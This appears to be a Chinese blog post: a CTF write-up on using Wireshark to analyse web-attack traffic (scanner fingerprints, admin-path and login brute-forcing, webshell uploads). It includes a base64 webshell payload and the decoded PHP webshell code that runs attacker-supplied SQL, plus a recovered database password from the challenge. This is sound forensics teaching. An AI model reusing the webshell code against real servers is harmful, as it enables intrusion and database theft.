2021-05-03Wireshark流量包分析

最新推荐文章于 2024-05-16 18:35:18 发布
最新推荐文章于 2024-05-16 18:35:18 发布
阅读量3.1k 收藏 38
点赞数 4
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37442062/article/details/116373144
版权

目录

WEB扫描分析

后台目录爆破分析

后台账号爆破

WEBSHELL上传

其他题目

        参考链接

WEB数据包分析的题目主要出现WEB攻击行为的分析上, 典型的WEB攻击行为有:WEB扫描、后台目录爆破、后台账号爆破、WEBSHELL上传、SQL注入等等。

WEB扫描分析

题型:

通过给出的流量包获取攻击者使用的WEB扫描工具。

解题思路:

常见的WEB扫描器有Awvs,Netsparker,Appscan,Webinspect,Rsas(绿盟极光),Nessus,WebReaver,Sqlmap等。要识别攻击者使用的是哪一种扫描器,可通过wireshark筛选扫描器特征来得知。

相关命令:http contains “扫描器特征值”。

1.awvs:acunetix

2.netsparker:netsparker

3.appscan:Appscan

4.nessus:nessus

5.sqlmap:sqlmap

常见的扫描器特征参考:常见扫描器或者自动化工具的特征(指纹)

【练习】安恒八月月赛流量分析:黑客使用的是什么扫描器?

后台目录爆破分析

题型:

已知攻击者通过目录爆破的手段获取了网站的后台地址,请通过给出的流量包获取后台地址。

解题思路:

要获取流量包中记录的后台地址,可通过wireshark筛选后台url特征来得知。

相关命令:http contains “后台url特征”。

常见后台url特征:

1.admin

2.manager

3.login

4.system

 

【练习】安恒八月月赛流量分析:黑客扫描到的后台登录地址是什么?

/admin/login.php?rec=login 

后台账号爆破

题型:

已知攻击者通过暴力破解的手段获取了网站的后台登陆账号,请通过给出的流量包获取正确的账号信息。

解题思路:

WEB账号登陆页面通常采用post方法请求,要获取流量包中记录的账号信息可通过wireshark筛选出POST请求和账号中的关键字如‘admin’。

相关命令:http.request.method=="POST"  and  http contains "关键字"

【练习】安恒八月月赛流量分析:黑客使用了什么账号密码登录了web后台?

思路1:登陆后台99%使用的是POST方法,使用过滤器+追踪TCP流,有302重定向则登录成功。刚才使用扫描的源ip一定是黑客的ip地址,使用过滤可得

http.request.method=="POST" and ip.src==192.168.94.59 and http contains "rec=login"

思路2:返回字段长度为75X,说定post登录成功(目前没搞懂)

 WEBSHELL上传

题型:

已知攻击者上传了恶意webshell文件,请通过给出的流量包还原出攻击者上传的webshell内容。

解题思路:

Webshell文件上传常采用post方法请求,文件内容常见关键字eval,system,assert要。获取流量包中记录的webshell可通过wireshark筛选出POST请求和关键字.

相关命令:http.request.method=="POST"  and  http contains "关键字"

【练习】安恒八月月赛流量分析:黑客上传的webshell文件名是?内容是什么?

Form item: "action" = "QGluaV9zZXQgKCAiZGlzcGxheV9lcnJvcnMiLCAiMCIgKTtAc2V0X3RpbWVfbGltaXQgKCAwICk7
QHNldF9tYWdpY19xdW90ZXNfcnVudGltZSAoIDAgKTtlY2hvICgiLT58Iik7OyRtID0gZ2V0X21h
Z2ljX3F1b3Rlc19ncGMgKCk7JGNvbmYgPSAkbSA/IHN0cmlwc2xhc2hlcyAo

 这样好像并不完整,追踪tcp流

其他题目

1.某公司内网网络被黑客渗透,请分析流量,黑客在robots.txt中找到的flag是什么

思路一:导出对象,搜索robots.txt

保存,然后打开

flag:flag:87b7cb79481f317bde90c116cf36084b

思路二:直接过滤http contains"Disallow"

2.某公司内网网络被黑客渗透,请分析流量,黑客找到的数据库密码是多少

 常见的方法是:

根据http contains"dbhost"找到数据库服务器地址10.3.3.101之后,追踪tcp流

@ini_set ( "display_errors", "0" );@set_time_limit ( 0 );@set_magic_quotes_runtime ( 0 );echo ("->|");;$m = get_magic_quotes_gpc ();$conf = $m ? stripslashes ( $_POST ["z1"] ) : $_POST ["z1"];$ar = explode("choraheiheihei", $conf);$dbn = $m ? stripslashes ( $_POST ["z2"] ) : $_POST ["z2"];$sql = base64_decode ( $_POST ["z3"] );$T = @mysql_connect($ar[0],$ar[1],$ar[2]);@mysql_query ( "SET NAMES utf8" );if($dbn==""){$sql = "SHOW DATABASES";$q = @mysql_query ( $sql );$i = 0;while($rs=@mysql_fetch_row($q)){echo(trim($rs[0]).chr(9))."\t|\t\r\n";}@mysql_close($T);;echo("|<-");die();}else{    @mysql_select_db ( $dbn );$q = @mysql_query ( $sql );$i = 0;while ( $col = @mysql_field_name ( $q, $i ) ) {echo ($col . "\t|\t");$i ++;}echo ("\r\n");while ( $rs = @mysql_fetch_row ( $q ) ) {for($c = 0; $c < $i; $c ++) {echo (trim ( $rs [$c] ));echo ("\t|\t");}echo ("\r\n");}@mysql_close ( $T );;echo ("|<-");die ();}

base64解码之后,如上
 

提取出以下主要文本

&z1=10.3.3.101choraheiheiheiwebchoraheiheiheie667jUPvJjXHvEUv&z2=web&z3=c2VsZWN0ICogZnJvbSBkb3Vfc2hvdw==
$ar = explode("choraheiheihei", $conf)
可知以choraheiheihei为分割符号,提取出用户名为web,密码为e667jUPvJjXHvEUv

 

3.某公司内网网络被黑客渗透,请分析流量,黑客在数据库中找到的hash_code是什么(手上没有webtwo.pcap)

4.某公司内网网络被黑客渗透,请分析流量,黑客破解了账号ijnu@test.com得到的密码是什么

 

  1. 某公司内网网络被黑客渗透,请分析流量,被黑客攻击的web服务器,网卡配置是是什么,提交网卡内网ip

某公司内网网络被黑客渗透,请分析流量,黑客使用了什么账号登陆了mail系统(形式: username/password)(没有对应的pcap)

某公司内网网络被黑客渗透,请分析流量,黑客获得的vpn的ip是多少(没有对应的pcap)

参考链接

CTF流量分析之题型深度解析

ctf之流量分析

安恒八月月赛流量分析writeup

进一寸有一寸的欢喜077
关注
  • 4
    点赞
  • 38
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
流量分析-Wireshark -操作手册(不能说最全,只能说更全)
路baby的博客
03-22 1万+
流量分析-Wireshark -操作手册(不能说最全,只能说更全) 基于各种比赛做的总解 基于协议过滤⼿法👍 常用筛选命令方法 常⽤快捷键👍 数据筛选 顶峰相见
中职网络安全2021年国赛Wireshark流量分析题目+capture.pcapng数据文件
09-15
中职网络安全2021年国赛Wireshark流量分析题目+capture.pcapng数据文件
流量分析(安恒八月赛)
whale_waves的博客
11-23 537
这里看a.php流量,能发现a.php用的是1234作为密码,并且从@eval并且传输参数base64加密来看,看起来像是菜刀的特征。这道题似乎是想让你看黑客通过webshell来看robots.php的流量,我做到后面分析黑客通过webshell执行的命令才看到。这里我直接查找的POST流量,这里能明显看到,黑客在成功登陆以后通过某个东西上传了一个a.php文件。这里能看到黑客在登陆后成功访问了admin/index.php,所以上一条流量就是成功登录的账户密码。
hw蓝队初级面试总结_weblogic反序列化流量特征(1)
最新发布
2401_84296945的博客
05-16 389
需要完整版PDF学习资源。
使用Wireshark进行网络流量分析
qq_68163788的博客
01-02 6638
通过Wireshark,我们可以捕获和分析网络数据,查看网络中的数据传输情况,识别网络中的问题和安全隐患,并进行网络性能优化。Wireshark支持多种协议的分析括TCP、UDP、IP、ICMP等,可以帮助我们深入了解网络通信过程中的细节。它还提供了强大的过滤功能,可以根据需要筛选出特定的数据进行分析,帮助我们更快地定位问题所在。除了基本的数据捕获和分析功能外,Wireshark还提供了统计信息和图形化分析工具,可以帮助我们更直观地了解网络流量的情况。
流量分析_安恒八月月赛
Lemon's blog
07-09 3967
前言: 流量分析很有意思,之前忙于考试,暂时没有学习了,考试结束了就来总结一下一些CTF下常见的流量分析的题型。 0x00:流量修复 使用wireshark打开流量发现报错,可以使用
Wireshark分析流量案例
热门推荐
mcmuyanga的博客
03-08 1万+
wireshark工具常用筛选命令方法 测试文件:https://pan.baidu.com/s/1QuMdefZHSqlaLSHaMVGb4w 提取码:tmjs 使用Wireshark查看并分析attack.pcapng数据文件,通过分析数据attack.pcapng找出黑客的IP地址,并将黑客的IP地址作为FLAG(形式:[IP地址])提交: 解: 首先筛选一下http协议的get传参和post传参的数据 http.request.method==GET 发现了两个登录界面的数据
Webshell之蚁剑流量分析
qq_51323560的博客
05-15 2278
--------------------------------------------------------------------------------------------------------------------------------第一次学习webshell流量分析,还请大佬们多多指教。参数1,str参数是指将要进行截取字符操作的字符串。参数3, length参数是说明本次截取操作的长度,(2)分析发现真正有效的字符串是去除头部的2个字母。(3)查看虚拟终端执行的命令。
Wireshark 分析常见 Web 攻击的流量特征
weixin_51559599的博客
12-08 4852
攻击者在输入字段中插入恶意的 SQL 语句,实现对数据库的增删改查。可以在 http 请求中通过查找 SQL 注入语句中的 union、select、sleep 等关键字来判断 SQL 注入的流量dvwa SQL Injection low 为例poc筛选目的 ip 为靶场服务器并且为 http 的流量找到 SQL 请求的 http 报文可以看到unionselectdatabase等 SQL 注入的关键字解码后即可看到原始 poc。
wireshark网络安全流量分析基础
2201_75719295的博客
04-07 1914
作为网络流量安全分析的好工具,功能其实也很多,本次分享的只是一些常见功能,如果对网络流量安全分析感兴趣,可以多去使用wireshark研究攻击数据特征,可以先从简单web攻击数据开始,再去看看一些窃密、木马、APT相关数据,后面我也会慢慢分享一些关于分析威胁流量的文章,也是记录自己的一个学习过程。其他协议相关文件也一样。海量数据中要想能察觉到可疑通信,找到攻击的蛛丝马迹,那就需要对一些端口、协议、请求方式和攻击特征等进行过滤,不断缩小可疑流量范围,才能更好进一步分析达到最终溯源的目的。
网络数据分析溯源(WebShell密码)
qq_36933272的博客
09-05 1515
wireshark打开数据 有题目提示,有人连接过一句话的webshell,猜想可能是asp、php之类的木马 用http.request.method ==“POST” && http contains "php"尝试过滤,发现xiaoma.php 查看发现d76R3478就是webshell的密码 输入密码,得到key ...
使用winpcap进行ip流量分析程序
05-11
使用winpcap进行ip流量分析程序,winpcap大家懂的,流量分析大家也懂的,内含源码和说明文档。
IP流量 分析程序
11-10
分析数据IP的版本、头长度、服务类型、总长度、标识、分段偏移值、生存时间、协议类型、校验和、源IP和目的IP地址等内容
Wireshark-win64-2.9.0网路抓数据分析工具
01-07
除了实时抓Wireshark还支持导入已记录的捕文件进行离线分析,这在无法直接访问网络环境或者需要回顾历史流量时非常有用。 9. **安全性分析**: Wireshark在安全领域也有广泛应用,如分析SSL/TLS会话以检查...
WireShark 网络流量分析工具
09-06
Wireshark是一款强大的网络流量分析工具,被广泛应用于网络安全、故障排查和性能优化等领域。它以前的名字是Ethereal,由于其开源、免费且跨平台的特性,深受全球IT专业人士的喜爱。下面将详细介绍Wireshark的功能、...
溯源取证-流量分析 中级难度的资源
05-30
【标签】:“溯源取证-流量分析资源”表明了这个压缩含的相关工具和数据,主要聚焦于通过流量分析来追查网络事件的来源,以及如何利用各种日志文件进行证据收集。 【文件详解】: 1. **Zui-Setup-1.0.1.exe*...
wireshark-gm-wireshark
07-25
Wireshark是一款全球知名的网络封分析软件,广泛用于网络故障排查、性能分析以及网络安全检测。在这个压缩文件中,含的是Wireshark-GM的一个特定版本——2.6.1。 Wireshark的主要功能在于捕获并显示网络流量...
WebShell简介
YJ_12340的博客
08-08 1608
• JSP类型• ASP类型• PHP类型。
wireshark流量分析
FisrtBqy的博客
03-31 1318
流量分析wireshark使用
Wireshark查看ip
04-19
Wireshark是一款开源的网络协议分析工具,可以用于查看和分析网络数据。通过Wireshark,你可以查看IP数据的详细信息,括源IP地址、目标IP地址、协议类型、数据长度等。 要使用Wireshark查看IP数据,你可以按照以下步骤进行操作: 1. 下载并安装Wireshark软件。 2. 打开Wireshark,在主界面的网卡列表中选择要监听的网络接口。 3. 点击“开始”按钮开始捕获网络数据。 4. 在捕获过程中,Wireshark会显示捕获到的数据列表。你可以选择其中一个数据,并在详细信息窗格中查看IP头部的信息。 5. 在详细信息窗格中,你可以找到源IP地址和目标IP地址,以及其他与IP协议相关的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值